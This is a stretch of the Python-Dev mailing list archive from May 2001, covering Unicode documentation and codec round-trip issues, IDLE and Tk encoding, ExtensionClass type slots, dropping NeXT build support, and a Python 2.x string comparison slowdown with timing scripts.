> 6.1.x - Unicode and the file system
>   - general discussion.
>   - Windows specific
>   - Mac specific should that appear.
>   - OS' with no special support (ie, "the rest")
>
> Does that make sense?

So far as it goes, yes.  I think the manual desperately needs a Unicode
section for other reasons, though:  from traffic on c.l.py, it's clear that
few people can figure out how to do *anything* with Unicode now unless their
first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
<wink>).  There's no overview and there are no examples.  The primary string
method doesn't even mention Unicode (here paraphrasing questions that pop
up):

    encode([encoding[,errors]])
    Return an encoded version of the string.

What does "encoded version" mean?  Is that another string?  An encoding
object of some sort?  Etc.

    Default encoding is the current default string encoding.

What's the "current default string encoding"?  How can I find out?  Can't
even guess what *type* it has (string? magic object? little integer?).  If I
don't want the default encoding, how do I specify a different one?  What are
the possible values?  Again, can't even guess the type of the object that
needs to be passed for encoding.

    errors may be given to set a different error handling scheme.
    The default for errors is 'strict', meaning that encoding
    errors raise a ValueError. Other possible values are 'ignore'
    and 'replace'.

So what do 'ignore' and 'replace' mean?

There's more left unsaid here than a single example could clarify, but
there's not even an example -- so people stare at this wholly
uncomprehending.

If they stumble into the unicode() builtin function (in a different part of
the manual, neither referencing nor referenced by the .encode() method), it's
no better:

    unicode(string[, encoding[, errors]])
    Decodes string using the codec for encoding.

What?  Hard to even guess what the function returns.  Maybe, from the name, a
Unicode string?

    Error handling is done according to errors.

What?

    The default behavior is to decode UTF-8 in strict mode,
    meaning that encoding errors raise ValueError.

How do encoding errors arise from a function that *de*codes?

    See also the codecs module.

Which helps, but the relationship between the codecs module and the unicode()
function isn't spelled out there either.  Look up "encoding" in the index,
and you get pointers to base64, quoted-printable and the mimetypes module,
which only confuses things more.
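The kind of example being asked for might look like this in Python 3 terms, where encode() goes from text (str) to bytes and decode() goes back. Variable names are illustrative only.

```python
import sys

text = "caf\u00e9"                          # a str (Unicode) object

encoded = text.encode("utf-8")              # encode: str -> bytes
decoded = encoded.decode("utf-8")           # decode: bytes -> str

# errors= controls what happens when a character has no mapping.
strict_failed = False
try:
    text.encode("ascii")                    # default errors="strict"
except UnicodeEncodeError:                  # a subclass of ValueError
    strict_failed = True
ignored = text.encode("ascii", "ignore")    # drops the unencodable character
replaced = text.encode("ascii", "replace")  # substitutes b"?"
bad_bytes = b"caf\xe9".decode("ascii", "replace")  # decoding substitutes U+FFFD

print("default encoding:", sys.getdefaultencoding())
```

The same errors values apply in both directions; a failing decode raises UnicodeDecodeError, which is also a ValueError subclass.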

I don't expect you to fix this <wink>, I'm trying to get across that the
Unicode docs need work even without new gimmicks.  If Fred agrees, I'm sure
he'll think of a good place to put the new info too.

> I have made this change to Misc/NEWS.  Does this look OK
> (obviously once I know what to replace "[????]" with :)

Absolutely, and I don't even have to read it to say so <wink>:  once
*something* is checked in, we're assured it won't get dropped on the floor
come release time, and anyone who has any quibbles with it can check in
changes.  It's not like checking in a NEWS item can break the std test suite
or cause HP-UX to crash.

well-not-really-sure-about-the-latter-ly y'rs  - tim


From barry at digicool.com  Mon May 14 06:16:18 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 00:16:18 -0400
Subject: [Python-Dev] Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOELPKBAA.tim_one@email.msn.com>
	<02e501c0dade$ab7f1080$e46940d5@hagrid>
Message-ID: <15103.23570.191115.85137@anthem.wooz.org>

>>>>> "FL" == Fredrik Lundh <fredrik at pythonware.com> writes:

    FL> (is Jython using exactly the same hashing and dictionary
    FL> algorithms as CPython?  or does it work by accident also under
    FL> Jython?)

Most likely, it's pure accident.  Jython's PyDictionary uses a Java
Hashtable underneath, so you're dependent on its behavior.

-Barry


From esr at thyrsus.com  Mon May 14 07:20:17 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 01:20:17 -0400
Subject: [Python-Dev] State of curses tutorial?
Message-ID: <20010514012017.A6971@thyrsus.com>

A user pointed out a typo in the "Curses Programming with Python" tutorial
at <http://py-howto.sourceforge.net/curses/curses.html>.  While attempting
to fix it, I discovered a few things:

1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
   was Andrew, that's OK -- but the reference in the latest version of the
   library docs still cites him.

2. I don't seem to have the TeX source anymore.  Where can I download it?

3. Perhaps it's time to start putting howtos in the nondist part of the
   CVS tree?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

Power concedes nothing without a demand. It never did, and it never will.
Find out just what people will submit to, and you have found out the exact
amount of injustice and wrong which will be imposed upon them; and these will
continue until they are resisted with either words or blows, or with both.
The limits of tyrants are prescribed by the endurance of those whom they
oppress.
	-- Frederick Douglass, August 4, 1857


From greg at cosc.canterbury.ac.nz  Mon May 14 07:36:49 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 14 May 2001 17:36:49 +1200 (NZST)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <20010511145640.9FCB5303181@snelboot.oratrix.nl>
Message-ID: <200105140536.RAA18098@s454.cosc.canterbury.ac.nz>

Jack Jansen <jack at oratrix.nl>:

> MacOS (<= 9) itself doesn't have chdir, because it doesn't believe
> in current directories (by design).

Well, it does have an equivalent (HSetVol). But it's not used
much by Mac software because it's usual to work with full file
specifications at all times, at least internally.


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 07:38:24 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 07:38:24 +0200
Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT
In-Reply-To: <3AFF2E8B.31B9ED97@FourThought.com> (message from Mike Olson on
	Sun, 13 May 2001 19:02:03 -0600)
References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> <3AFF2E8B.31B9ED97@FourThought.com>
Message-ID: <200105140538.f4E5cOb01301@mira.informatik.hu-berlin.de>

> Should we standardize all of the python xml extensions with a py
> prefix?  pyReleaseNode or py_releaseNode?  Then we will never have to
> worry about a name clash.

IMO, no. The entire interface together is the Python DOM mapping. In
the unlikely event of a name clash, we could still decide to rename
the DOM function, or find some other magic (e.g. overloading on the
argument count).

Regards,
Martin


From mal at lemburg.com  Mon May 14 11:02:19 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:02:19 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References: <LNBBLJKPBEHFEDALKOLCOEOMKBAA.tim.one@home.com>
Message-ID: <3AFF9F1B.A1CDD617@lemburg.com>

Tim Peters wrote:
> 
> [M.-A. Lemburg]
> > ...
> > The "right" thing to do here, is to simply remove cp875
> > from the test for round-tripping.
> 
> I'm relieved you think so, since that's what I already did <wink>.
> 
> > It is not the only encoding which fails this test, but it's not
> > our fault: the codecs were all generated from the original codec
> > maps at the Unicode.org site.
> >
> > If their mappings are broken, we can't do much about it... other
> > than to ignore the error or remove the codec altogether.
> 
> On general principle I don't like either of those -- "in the face of
> ambiguity, refuse the temptation to guess".  It's at least surprising to see
> 
> >>> unicode("?", "cp875").encode("cp875")
> '\xfd'
> >>>
> 
> now, yes?  Would it be better if an ambiguous encoding raised an exception in
> "strict" mode?  That is, a third choice is to alert users when they're
> relying on a broken part of a mapping.

The problem is: which part would raise the exception -- the
encoder or the decoder ?

Here are some more options:

* sort the items before creating the encoding table from the
  decoding one (makes the mapping stable)

* map keys which have multiple mappings in the encoding table
  to None -- this causes their usage to raise an exception
  (undefined mapping)
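Both options can be sketched in Python 3 as a function that inverts a decoding map (byte value to code point) into an encoding map. Everything here is hypothetical: the function names, the ambiguity flag, and the toy three-entry map, which stands in for a real generated table such as cp875's and does not reproduce its actual entries. A round-trip check like the one discussed above is included to show which bytes each option leaves broken.

```python
def build_encoding_map(decoding_map, undefined_on_ambiguity=True):
    """Invert {byte: code point} into {code point: byte}.

    Items are processed in sorted order, so the result does not depend on
    dictionary iteration order (the first option).  If undefined_on_ambiguity
    is true, a code point reached from several bytes maps to None instead
    (the second option); otherwise the lowest such byte wins.
    """
    encoding_map = {}
    for byte, codepoint in sorted(decoding_map.items()):
        if codepoint is None:  # byte is undefined in the decoding map
            continue
        if codepoint not in encoding_map:
            encoding_map[codepoint] = byte
        elif undefined_on_ambiguity:
            encoding_map[codepoint] = None
    return encoding_map


def charmap_encode(text, encoding_map):
    """Strict encoder: unknown or ambiguous characters raise."""
    out = bytearray()
    for i, ch in enumerate(text):
        byte = encoding_map.get(ord(ch))
        if byte is None:
            raise UnicodeEncodeError("toy-charmap", text, i, i + 1,
                                     "character maps to <undefined>")
        out.append(byte)
    return bytes(out)


def round_trip_failures(decoding_map, encoding_map):
    """Bytes that do not survive decode-then-encode."""
    return [byte for byte, cp in sorted(decoding_map.items())
            if cp is not None and encoding_map.get(cp) != byte]


# Toy table: bytes 0x01 and 0x02 both decode to U+00AD.
toy = {0x41: 0x41, 0x01: 0xAD, 0x02: 0xAD}
print(round_trip_failures(toy, build_encoding_map(toy)))         # [1, 2]
print(round_trip_failures(toy, build_encoding_map(toy, False)))  # [2]
```

With the second option, charmap_encode("\u00ad", ...) raises instead of silently picking one of the two bytes, which matches the "refuse the temptation to guess" behaviour Tim suggested for "strict" mode.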

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 14 11:15:43 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 14 May 2001 11:15:43 +0200
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
Message-ID: <3AFFA23F.248517E3@lemburg.com>

Tim Peters wrote:
> 
> [Mark Hammond]
> > ...
> > Where should the "real" documentation go?  It seems maybe we need a
> > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something
> > like:
> >
> > 6.1.x - Unicode and the file system
> >   - general discussion.
> >   - Windows specific
> >   - Mac specific should that appear.
> >   - OS' with no special support (ie, "the rest")
> >
> > Does that make sense?
> 
> So far as it goes, yes.  I think the manual desperately needs a Unicode
> section for other reasons, though:  from traffic on c.l.py, it's clear that
> few people can figure out how to do *anything* with Unicode now unless their
> first name begins with "M" (Mark, Martin, Marc -- definitely not Skip
> <wink>).  There's no overview and there are no examples.  The primary string
> method doesn't even mention Unicode (here paraphrasing questions that pop
> up):
> [...]

True. The main source of documentation for Unicode still is the
proposal itself (Misc/unicode.txt). It needs some reordering
and a few examples, but does contain all the information needed
to grasp what the implementation intends and how it works.

If that's still not enough, there are numerous doc-strings in
the codecs.py module, more technical docs in the API reference 
and finally the unicodeobject.h header file itself.

Another source for documentation and examples is the i18n-sig
page on python.org.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From jack at oratrix.nl  Mon May 14 11:55:26 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Mon, 14 May 2001 11:55:26 +0200
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
Message-ID: <20010514095527.009E8303181@snelboot.oratrix.nl>

I'm not too thrilled with the way the filename encoding stuff was done, with a 
global var declared in posixmodule.c which is then used by bltinmodule.c. It 
took me quite a while to figure out why my builds were failing, and how to fix 
it. And I think other minority platforms may have the same problem, so maybe 
it's a good idea to move the Py_FileSystemDefaultEncoding declaration to an 
include file, and do the initialization in a more "common" place?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From fredrik at pythonware.com  Mon May 14 12:18:49 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Mon, 14 May 2001 12:18:49 +0200
Subject: [Python-Dev] State of curses tutorial?
References: <20010514012017.A6971@thyrsus.com>
Message-ID: <007f01c0dc5f$459d3b70$0900a8c0@spiff>

eric wrote:
>
> 1. Somebody seems to have removed Andrew Kuchling's name from it.  If it
>    was Andrew, that's OK -- but the reference in the latest version of the
>    library docs still cites him.

that would be either you (who reworked the document), or andrew
(who checked in your changes).  looks like fred has already fixed it:

    Revision 1.13, Tue Apr 10 17:35:31 2001 UTC (4 weeks, 5 days ago) by fdrake

    Use appropriate markup for multiple authors; LaTeX's \author is not
    additive; the second occurrence was causing the first author to be dropped.

> 2. I don't seem to have the TeX source anymore.  Where can I download it?

it's in the py-howto CVS tree:

    http://sourceforge.net/projects/py-howto

Cheers /F


From loewis at informatik.hu-berlin.de  Mon May 14 13:29:21 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:29:21 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <3AFEC72A.33076220@lemburg.com> (mal@lemburg.com)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <3AFEC72A.33076220@lemburg.com>
Message-ID: <200105141129.NAA22305@pandora.informatik.hu-berlin.de>

> I have a bug report assigned to myself which indicates similar
> problems with _tkinter and Tk/Tcl. There were other problem
> reports on the German Python mailing list going in the same
> direction too.
> 
> The basic problem seems to be that Tk/Tcl applies too much
> magic to the text widget contents in order to find out the
> used encoding and this can easily cause the whole encoding
> mechanism to fail.

This is actually a different problem. In this scenario here, the user
types a non-ASCII character into a text widget, then _tkinter returns a
Unicode object (IMO rightfully so). In the other problem, the Python
program puts a byte string into a text widget, the user enters some
more characters, and _tkinter returns a byte string which does not
follow any encoding.

> A Tk/Tcl expert should really look into this and fix _tkinter.c
> to aid Tk/Tcl in not mixing up the encodings (e.g. it would
> probably be a good idea to recode Python 8bit-strings into
> whatever encoding Tk/Tcl assumes as default).

Again, this is not the issue here: Both _tkinter and Tk behave
absolutely correctly IMO. The question is how IDLE should deal with it.

Regards,
Martin


From loewis at informatik.hu-berlin.de  Mon May 14 13:41:26 2001
From: loewis at informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 14 May 2001 13:41:26 +0200 (MEST)
Subject: [Python-Dev] IDLE and non-ASCII characters
In-Reply-To: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> (message
	from Guido van Rossum on Sun, 13 May 2001 17:51:17 -0500)
References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> <200105132251.RAA21344@cj20424-a.reston1.va.home.com>
Message-ID: <200105141141.NAA22376@pandora.informatik.hu-berlin.de>

> Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the
> Python prompt, both on Linux and on Windows 98.  It prints as
> '\xe4\xf6' on both systems.  What changed?

Perhaps the Tcl version? That sounds like the issue that Marc talked
about: Tk behaves differently when text is entered programmatically
(and perhaps through cut-n-paste), as compared to text entered through
the keyboard. Using cut-n-paste with Tk 8.3.1, CVS python, X11R6.3 on
Solaris 8 still gives me the UnicodeError.

Regards,
Martin


From MarkH at ActiveState.com  Mon May 14 14:20:43 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Mon, 14 May 2001 22:20:43 +1000
Subject: [Python-Dev] Py_FileSystemDefaultEncoding
In-Reply-To: <20010514095527.009E8303181@snelboot.oratrix.nl>
Message-ID: <LCEPIIGDJPKCOIHOBJEPKELCDMAA.MarkH@ActiveState.com>

> I'm not too thrilled with the way the filename encoding stuff was
> done, with a

My apologies.  I did try and publicise the patch as much as possible.  A
misguided attempt at a low-impact change :(  I have checked in the changes
you suggest.

Mark.


From barry at digicool.com  Mon May 14 14:54:59 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Mon, 14 May 2001 08:54:59 -0400
Subject: [Python-Dev] Unicode docs
References: <LNBBLJKPBEHFEDALKOLCEEPOKBAA.tim.one@home.com>
	<3AFFA23F.248517E3@lemburg.com>
Message-ID: <15103.54691.560967.853132@anthem.wooz.org>

>>>>> "M" == M  <mal at lemburg.com> writes:

    M> True. The main source of documentation for Unicode still is the
    M> proposal itself (Misc/unicode.txt). It needs some reordering
    M> and a few examples, but does contain all the information needed
    M> to grasp what the implementation intends and how it works.

As a first step, why not PEP-ify that document, much as has been
done with the DB-API (version 1 & 2)?  It can be an informational PEP.

-Barry


From esr at thyrsus.com  Mon May 14 17:11:57 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Mon, 14 May 2001 11:11:57 -0400
Subject: [Python-Dev] State of curses tutorial?
In-Reply-To: <007f01c0dc5f$459d3b70$0900a8c0@spiff>; from fredrik@pythonware.com on Mon, May 14, 2001 at 12:18:49PM +0200
References: <20010514012017.A6971@thyrsus.com> <007f01c0dc5f$459d3b70$0900a8c0@spiff>
Message-ID: <20010514111157.C10920@thyrsus.com>

Fredrik Lundh <fredrik at pythonware.com>:
> it's in the py-howto CVS tree:
> 
>     http://sourceforge.net/projects/py-howto

What module is the Python-HOWTO in?
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"The best we can hope for concerning the people at large is that they be
properly armed."
        -- Alexander Hamilton, The Federalist Papers at 184-188


From skip at pobox.com  Mon May 14 17:54:54 2001
From: skip at pobox.com (skip at pobox.com)
Date: Mon, 14 May 2001 10:54:54 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
Message-ID: <15103.65486.61021.328424@beluga.mojam.com>

    Martin> That *should* work, except that it also has its 'methods' field
    Martin> where tp_traverse would go, and its class_flags field where
    Martin> tp_clear would go.

Okay, so I'm completely confused now.  I extended the definition of
ECTypeType to include this after the doc string slot:

      (traverseproc)0,              /* tp_traverse */
      (inquiry)0,                   /* tp_clear */
      (richcmpfunc)0,               /* rich comparisons */
      0L,                           /* weak reference enabler */

    #ifdef COUNT_ALLOCS
      /* these must be last */
      0,                            /* tp_alloc */
      0,                            /* tp_free */
      0,                            /* tp_maxalloc */
      (struct _typeobject *)0,      /* tp_next */
    #endif

When I looked at the definition of ECType, after the doc string I saw

      METHOD_CHAIN(ExtensionClass_methods)

as Martin indicated.  I can't simply insert the same zeroes at the end of
the ECType def'n as I did at the end of the ECTypeType definition.  Where
does this METHOD_CHAIN thing go?  I looked at the def'n of struct
_typeobject in Include/object.h but didn't see a slot that looked suitable.

FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
I get 

    Fatal Python error: UNREF invalid object

when I run my failing script.  This is with and without making any changes
to ECType or ECTypeType.

Skip


From sdm7g at Virginia.EDU  Mon May 14 19:04:56 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Mon, 14 May 2001 13:04:56 -0400 (EDT)
Subject: [Python-Dev] deprecated platforms
Message-ID: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu>

Jack asked me about:

https://sourceforge.net/tracker/?func=detail&aid=420601&group_id=5470&atid=105470

which concerns removing the support for --with-next-framework from 
the build procedure. 

I'm all for removing it: 
 it's broken for OSX,
 if it worked, it doesn't do the whole job ( I think framework 
   support should eventually be added for OSX with a separate
   post-build script -- a real framework should encapsulate 
   all of the python libs, docs and headers files in one bundle. ) 
 nobody seems to know if it still works on Next or OpenStep.

 However, I said I thought there ought to be some sort of official
procedure for removing platform support. 
 
 This doesn't seem to be addressed in either PEP 4 (Deprecation
of Standard Modules) or PEP 5 (Guidelines for Language Evolution).

 I don't think it needs to be as involved a process as PEP 4 or 5 --
it's a more reversible decision than removing a feature from the
language.  Although, removing a platform dependent feature -- 
like in the long discussion about case sensitivity -- may be a 
bigger deal. 
 But I'm really thinking more about things like the Next case -- 
where there are build options and #ifdefs that, as far as we know,
haven't been tested in several versions. ( Believe it or not, there
are still folks hanging dearly onto their black NeXT cubes, and finding
them useful -- but I have no idea if any of them are using Python, 
and there's lots of users out there whom we only hear from when they
discover a problem. ) 

 Perhaps there should be some sort of "Last Call for Platform Saviour" :
if nobody steps forward who is willing to do test builds on that 
platform, support may be removed if maintaining it is getting in the way. 
 

 Any thoughts or opinions on this? 

 Are there any other platforms where this might become an issue ? 
 If this looks like it's unlikely to crop up again, then maybe we
  don't need to bother with a 'policy'. 

 What about support for particular compilers and build environments: 
 (Borland C on Windows and MPW on Mac are two examples of "minority" 
   compilers.) 


BTW: As I've thought more about this particular issue (--with-next-framework) 
 I don't think it's as big an issue -- removing that switch isn't going
 to break the build entirely (I think!). Pulling out all of the 
 #ifdefs for Next would be a larger issue, but that hasn't been proposed
 (yet). If the consensus is that this isn't a big enough issue, in general,
 to need an official policy, then I vote to pull it out and see if anyone
 screams. 

 
-- Steve Majewski


From guido at digicool.com  Mon May 14 22:53:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 14 May 2001 15:53:26 -0500
Subject: [Python-Dev] deprecated platforms
In-Reply-To: Your message of "Mon, 14 May 2001 13:04:56 -0400."
             <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
References: <Pine.NXT.4.21.0105141230070.435-100000@localhost.virginia.edu> 
Message-ID: <200105142053.PAA24202@cj20424-a.reston1.va.home.com>

I can't really add much to this discussion, since I have *absolutely*
*no* *idea* what kind of framework we're talking about here...

I agree with Steve that we shouldn't be too scared of removing support
for obsolete platforms.  People hanging on to obsolete platforms may
as well hang on to obsolete Python versions...

--Guido van Rossum (home page: http://www.python.org/~guido/)


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 21:40:21 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 21:40:21 +0200
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <15103.65486.61021.328424@beluga.mojam.com> (skip@pobox.com)
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com>
Message-ID: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>

> Okay, so I'm completely confused now.  I extended the definition of
> ECTypeType to include this after the doc string slot:
> 
>       (traverseproc)0,              /* tp_traverse */
>       (inquiry)0,                   /* tp_clear */
>       (richcmpfunc)0,               /* rich comparisons */
>       0L,                           /* weak reference enabler */
> 
>     #ifdef COUNT_ALLOCS
>       /* these must be last */
>       0,                            /* tp_alloc */
>       0,                            /* tp_free */
>       0,                            /* tp_maxalloc */
>       (struct _typeobject *)0,      /* tp_next */
>     #endif

Why did you do that? ECTypeType has the right data type
(PyTypeObject). It is the instances of PyExtensionClass that are
troubling.

> When I looked at the definition of ECType, after the doc string I saw
> 
>       METHOD_CHAIN(ExtensionClass_methods)
> 
> as Martin indicated.  I can't simply insert the same zeroes at the end of
> the ECType def'n as I did at the end of the ECTypeType definition.  

Of course not. ECType is of type PyExtensionClass, not of type
PyTypeObject. Those are similar, but not equal.

> Where does this METHOD_CHAIN thing go?  I looked at the def'n of
> struct _typeobject in Include/object.h but didn't see a slot that
> looked suitable.

Just have a look at ExtensionClass.h instead.

> FWIW, when I build Python and PyGtk with Py_DEBUG defined as Neil suggested,
> I get 
> 
>     Fatal Python error: UNREF invalid object
> 
> when I run my failing script.  This is with and without making any changes
> to ECType or ECTypeType.

BTW, what version of PyGtk did you try to compile? I've tried the
0.7.0-dont-use, and it can run examples/testgtk without major problems
(the example did need some updates, since it is apparently outdated).
My Gtk version was 1.2, on Linux.

In any case, I think you need to analyse this in a debugger.

Regards,
Martin


From tim at digicool.com  Mon May 14 22:12:44 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 14 May 2001 16:12:44 -0400
Subject: [Python-Dev] Comparison speed
Message-ID: <BIEJKCLHCIOIHAGOKOLHGEIFCAAA.tim@digicool.com>

Here's a simple test program:

from time import clock

indices = [1] * 100000

def doit():
    s = clock()
    i = 0
    while i < 100000:
        "ab" < "cd"
        i += 1
    f = clock()
    return f - s

for i in xrange(10):
    print "%.3f" % doit()

And here's output from 2.0, 2.1 and current CVS:

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.107
0.106
0.109
0.106
0.106
0.106
0.106
0.106
0.105
0.106

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.118
0.118
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

C:\Code\python\dist\src\PCbuild>python timech.py
0.119
0.117
0.118
0.117
0.118
0.117
0.118
0.117
0.118

So "something happened" between 2.0 and 2.1 to slow this overall by 10%.
string_compare hasn't changed, so rich comparisons are a good guess.  Note
that the more obvious timing loop obscures the issue:

def doit():
    s = clock()
    for i in indices:
        "ab" < "cd"
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.070
0.069
0.069
0.070
0.069
0.069
0.069
0.070
0.069
0.069

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.076
0.076
0.076
0.076
0.076
0.077
0.076
0.076
0.076
0.076

C:\Code\python\dist\src\PCbuild>python timech.py
0.069
0.070
0.070
0.069
0.069
0.070
0.070
0.069
0.070
0.069

for-loops are faster in current CVS than in 2.0 or 2.1, and that cancels out
the comparison slowdown.

If we try it with a type of comparison that avoids the richcmp machinery
(int < int is special-cased in ceval), current CVS is actually faster than
2.0:

def doit():
    s = clock()
    for i in indices:
        2 < 3
    f = clock()
    return f - s

C:\Code\python\dist\src\PCbuild>\python20\python timech.py
0.056
0.056
0.056
0.056
0.055
0.056
0.058
0.058
0.055
0.056

C:\Code\python\dist\src\PCbuild>\python21\python timech.py
0.059
0.059
0.059
0.060
0.060
0.059
0.059
0.060
0.059
0.059

C:\Code\python\dist\src\PCbuild>python timech.py
0.053
0.052
0.052
0.053
0.053
0.052
0.052
0.054
0.052
0.053

C:\Code\python\dist\src\PCbuild>

This also shows that 2.1 was a bit more slothful than 2.0 for some reason
other than richcmps.

These were all done on a Win2K box; timings vary too much on a Win9x box to
be useful.
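For anyone repeating the measurement today: time.clock() was removed in Python 3.8, and the timeit module takes care of repetition and timer choice. This is a hedged sketch only. The function name compare_loops and its parameters are assumptions, the operands are bound to names to rule out any compile-time folding, and the numbers it produces will not be comparable with the 2001 figures above.

```python
import timeit


def compare_loops(number=100000, repeat=5):
    """Best-of-`repeat` times for `number` string comparisons in two loop styles."""
    setup = f"a, b = 'ab', 'cd'\nindices = [1] * {number}"
    while_stmt = f"i = 0\nwhile i < {number}:\n    a < b\n    i += 1"
    for_stmt = "for i in indices:\n    a < b"
    # number=1: each statement already loops `number` times internally.
    t_while = min(timeit.repeat(while_stmt, setup, repeat=repeat, number=1))
    t_for = min(timeit.repeat(for_stmt, setup, repeat=repeat, number=1))
    return t_while, t_for


if __name__ == "__main__":
    t_while, t_for = compare_loops()
    print(f"while loop: {t_while:.4f}s   for loop: {t_for:.4f}s")
```

Taking the minimum of several runs, rather than printing each run as the original script does, is the usual way to damp the noise that made Win9x timings useless.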

Anybody care to take a stab at making the new richcmp and/or coerce code
ugly again?

speed-isn't-pretty-but-then-guts-rarely-are-ly y'rs  - tim


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 22:34:35 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 22:34:35 +0200
Subject: [Python-Dev] deprecated platforms
Message-ID: <200105142034.f4EKYZs05805@mira.informatik.hu-berlin.de>

> I'm all for removing it:

So am I. There are way too many build options for building Python on the
Mac-like systems already (e.g. after that change, you still have
--with-dyld - or rather the option of still building .o extensions).

If it is clearly broken (even if only on OSX), it should be
removed. Anybody interested in the flag would need to make it work
correctly before it can be revived.

> However, I said I thought there ought to be some sort of official
> procedure for removing platform support. 

I don't think such a procedure is necessary. It is not that any end
user would be concerned; building Python is an activity of system
administrators. The other PEPs are there because changing the language
or removing modules might break *applications* that used to work after
an upgrade of Python. With removed platform support, nothing will
break - installations would continue to use the last release that did
support that platform.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Tue May 15 00:06:57 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Tue, 15 May 2001 00:06:57 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142206.f4EM6vZ09790@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

When stepping through the code, I also missed support for the
relationship between identity and equality. E.g. in
PyObject_RichCompare, I'd expect

  if (v == w) {
     switch (op) {
     case Py_EQ:case Py_LE:case Py_GE:
        Py_INCREF(Py_True);
        return Py_True;
     case Py_NE:case Py_LT:case Py_GT:
        Py_INCREF(Py_False);
        return Py_False;
     }
  }

That would not help in your case, of course. I don't even know how
frequent comparing identical objects is in real life - but this is
something that PyObject_Compare has that PyObject_RichCompare
currently doesn't.

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 14 23:55:39 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 14 May 2001 23:55:39 +0200
Subject: [Python-Dev] Comparison speed
Message-ID: <200105142155.f4ELtdM09420@mira.informatik.hu-berlin.de>

> Anybody care to take a stab at making the new richcmp and/or coerce
> code ugly again?

Hi Tim,

With CVS Python, 1000000 iterations, and a for loop, I currently get

0.780
0.770
0.770
0.780
0.770
0.770
0.770
0.780
0.770
0.770

With the patch below, I get

0.720
0.710
0.710
0.720
0.710
0.710
0.710
0.720
0.710
0.710

The idea is to let strings support richcmp; this also allows some
optimization for the EQ case.
